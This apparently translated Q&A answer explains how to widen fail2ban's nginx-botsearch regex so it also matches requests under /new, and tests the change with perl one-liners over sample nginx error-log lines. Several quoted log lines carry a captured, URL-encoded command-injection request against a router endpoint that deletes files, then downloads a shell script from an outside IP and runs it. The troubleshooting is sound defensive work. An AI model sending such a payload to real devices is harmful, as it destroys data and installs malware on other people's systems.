fail2ban 正则表达式无法匹配 nginx 错误日志

好吧，我看了一下/etc/fail2ban/filter.d/nginx-botsearch.conf；它用于/etc/fail2ban/filter.d/botsearch-common.conf将以下<block>模式导入并插入到主正则表达式中：

\/?(<webmail>|<phpmyadmin>|<wordpress>|cgi-bin|mysqladmin)[^,]*

<webmail>这种模式只允许路径以与,<phpmyadmin>或模式匹配的字符串开头的请求<wordpress>（以及路径以文字字符串cgi-bin和开头的请求mysqladmin）通过；您的示例被丢弃请求的路径与这些条件都不匹配（其路径以 开头new），因此将被丢弃。

您可以像这样更改<block>模式/etc/fail2ban/filter.d/botsearch-common.conf，以便也允许路径以文字字符串开头的请求new通过：

\/?(<webmail>|<phpmyadmin>|<wordpress>|cgi-bin|mysqladmin|new)[^,]*

% cat input
 [error] 637#637: *7255 open() "/var/www/html/node01c/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 80.94.92.60, server: node-c.myhost.com, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1", host: "20.208.129.142"
 [error] 637#637: *7255 open() "/var/www/html/node01c/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 80.94.92.60, server: node-c.myhost.com, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1", host: "20.208.129.142"
 [error] 637#637: *7233 open() "/var/www/html/node01c/new/.git/config" failed (2: No such file or directory), client: 31.7.62.226, server: node-c.myhost.com, request: "GET /new/.git/config HTTP/1.1", host: "20.208.129.142"
% perl -ne '/^ \[error\] \d+#\d+: \*\d+ (\S+ )?\"\S+\" (failed|is not found) \(2\: No such file or directory\), client\: \d+\.\d+\.\d+\.\d+\, server\: \S*\, request: \"(GET|POST|HEAD) \/\/?(<webmail>|<phpmyadmin>|<wordpress>|cgi-bin|mysqladmin)[^,]* \S+\"\, .*?$/&&print' input 
 [error] 637#637: *7255 open() "/var/www/html/node01c/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 80.94.92.60, server: node-c.myhost.com, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1", host: "20.208.129.142"
 [error] 637#637: *7255 open() "/var/www/html/node01c/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 80.94.92.60, server: node-c.myhost.com, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1", host: "20.208.129.142"
% perl -ne '/^ \[error\] \d+#\d+: \*\d+ (\S+ )?\"\S+\" (failed|is not found) \(2\: No such file or directory\), client\: \d+\.\d+\.\d+\.\d+\, server\: \S*\, request: \"(GET|POST|HEAD) \/\/?(<webmail>|<phpmyadmin>|<wordpress>|cgi-bin|mysqladmin|new)[^,]* \S+\"\, .*?$/&&print' input
 [error] 637#637: *7255 open() "/var/www/html/node01c/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 80.94.92.60, server: node-c.myhost.com, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1", host: "20.208.129.142"
 [error] 637#637: *7255 open() "/var/www/html/node01c/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 80.94.92.60, server: node-c.myhost.com, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1", host: "20.208.129.142"
 [error] 637#637: *7233 open() "/var/www/html/node01c/new/.git/config" failed (2: No such file or directory), client: 31.7.62.226, server: node-c.myhost.com, request: "GET /new/.git/config HTTP/1.1", host: "20.208.129.142"